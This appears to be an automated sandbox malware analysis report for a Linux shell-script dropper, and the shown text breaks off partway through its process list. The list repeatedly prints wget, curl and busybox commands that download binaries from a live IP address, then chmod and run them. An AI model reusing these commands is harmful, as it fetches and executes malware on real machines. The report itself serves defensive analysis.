Malware Analysis Report

2025-04-03 19:10

Sample ID 241121-j5nwlazpbv
Target bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh
SHA256 bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb
Tags
defense_evasion antivm discovery
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb

Threat Level: Shows suspicious behavior

The file bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion antivm discovery

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Writes file to tmp directory

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-21 08:15

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-21 08:15

Reported

2024-11-21 08:17

Platform

ubuntu1804-amd64-20240729-en

Max time kernel

32s

Max time network

131s

Command Line

[/tmp/bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB N/A
N/A /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx N/A
N/A /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo N/A
N/A /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 N/A
N/A /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X N/A
N/A /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l N/A
N/A /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc N/A
N/A /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv N/A
N/A /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc N/A
N/A /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq N/A
N/A /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ N/A
N/A /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e N/A
N/A /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t N/A
N/A /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 N/A
N/A /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc N/A
N/A /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq N/A
N/A /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ N/A
N/A /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e N/A
N/A /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t N/A
N/A /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 N/A
N/A /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB N/A
N/A /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx N/A
N/A /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo N/A
N/A /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 N/A
N/A /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X N/A
N/A /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l N/A
N/A /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc N/A
N/A /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB /usr/bin/curl N/A
File opened for modification /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo /usr/bin/curl N/A
File opened for modification /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 /usr/bin/curl N/A
File opened for modification /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq /usr/bin/curl N/A
File opened for modification /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ /usr/bin/curl N/A
File opened for modification /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc /usr/bin/curl N/A
File opened for modification /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l /usr/bin/curl N/A
File opened for modification /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv /usr/bin/curl N/A
File opened for modification /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ /usr/bin/curl N/A
File opened for modification /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx /usr/bin/curl N/A
File opened for modification /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e /usr/bin/curl N/A
File opened for modification /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc /usr/bin/curl N/A
File opened for modification /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq /usr/bin/curl N/A
File opened for modification /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t /usr/bin/curl N/A
File opened for modification /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv /usr/bin/curl N/A
File opened for modification /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc /usr/bin/curl N/A
File opened for modification /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB /usr/bin/curl N/A
File opened for modification /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo /usr/bin/curl N/A
File opened for modification /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l /usr/bin/curl N/A
File opened for modification /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t /usr/bin/curl N/A
File opened for modification /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc /usr/bin/curl N/A
File opened for modification /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X /usr/bin/curl N/A
File opened for modification /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx /usr/bin/curl N/A
File opened for modification /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X /usr/bin/curl N/A
File opened for modification /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e /usr/bin/curl N/A
File opened for modification /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 /usr/bin/curl N/A
File opened for modification /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 /usr/bin/curl N/A
File opened for modification /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 /usr/bin/curl N/A

Processes

/tmp/bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh

[/tmp/bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/bin/chmod

[chmod 777 aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB

[./aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/bin/rm

[rm aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/usr/bin/wget

[wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/bin/chmod

[chmod 777 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx

[./6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/bin/rm

[rm 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/usr/bin/wget

[wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/bin/chmod

[chmod 777 uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo

[./uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/bin/rm

[rm uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/usr/bin/wget

[wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/bin/chmod

[chmod 777 d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7

[./d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/bin/rm

[rm d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/usr/bin/wget

[wget http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]

/bin/chmod

[chmod 777 sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]

/tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X

[./sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]

/bin/rm

[rm sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]

/usr/bin/wget

[wget http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]

/bin/chmod

[chmod 777 0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]

/tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l

[./0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]

/bin/rm

[rm 0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]

/usr/bin/wget

[wget http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]

/bin/chmod

[chmod 777 TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]

/tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc

[./TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]

/bin/rm

[rm TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]

/usr/bin/wget

[wget http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]

/bin/chmod

[chmod 777 yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]

/tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv

[./yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]

/bin/rm

[rm yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]

/usr/bin/wget

[wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/bin/chmod

[chmod 777 xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc

[./xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/bin/rm

[rm xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/usr/bin/wget

[wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/bin/chmod

[chmod 777 mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq

[./mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/bin/rm

[rm mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/usr/bin/wget

[wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/bin/chmod

[chmod 777 KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ

[./KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/bin/rm

[rm KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/usr/bin/wget

[wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/bin/chmod

[chmod 777 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e

[./1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/bin/rm

[rm 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/usr/bin/wget

[wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/bin/chmod

[chmod 777 jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t

[./jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/bin/rm

[rm jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/usr/bin/wget

[wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/bin/chmod

[chmod 777 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5

[./6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/bin/rm

[rm 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/usr/bin/wget

[wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/bin/chmod

[chmod 777 xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc

[./xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/bin/rm

[rm xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/usr/bin/wget

[wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/bin/chmod

[chmod 777 mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq

[./mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/bin/rm

[rm mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/usr/bin/wget

[wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/bin/chmod

[chmod 777 KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ

[./KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/bin/rm

[rm KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/usr/bin/wget

[wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/bin/chmod

[chmod 777 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e

[./1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/bin/rm

[rm 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/usr/bin/wget

[wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/bin/chmod

[chmod 777 jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t

[./jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/bin/rm

[rm jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/usr/bin/wget

[wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/bin/chmod

[chmod 777 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5

[./6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/bin/rm

[rm 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/usr/bin/wget

[wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/bin/chmod

[chmod 777 aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB

[./aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/bin/rm

[rm aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/usr/bin/wget

[wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/bin/chmod

[chmod 777 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx

[./6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/bin/rm

[rm 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/usr/bin/wget

[wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/bin/chmod

[chmod 777 uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo

[./uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/bin/rm

[rm uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/usr/bin/wget

[wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/bin/chmod

[chmod 777 d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7

[./d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/bin/rm

[rm d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/usr/bin/wget

[wget http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]

/bin/chmod

[chmod 777 sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]

/tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X

[./sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]

/bin/rm

[rm sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]

/usr/bin/wget

[wget http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]

/bin/chmod

[chmod 777 0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]

/tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l

[./0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]

/bin/rm

[rm 0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]

/usr/bin/wget

[wget http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]

/bin/chmod

[chmod 777 TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]

/tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc

[./TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]

/bin/rm

[rm TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]

/usr/bin/wget

[wget http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]

/usr/bin/curl

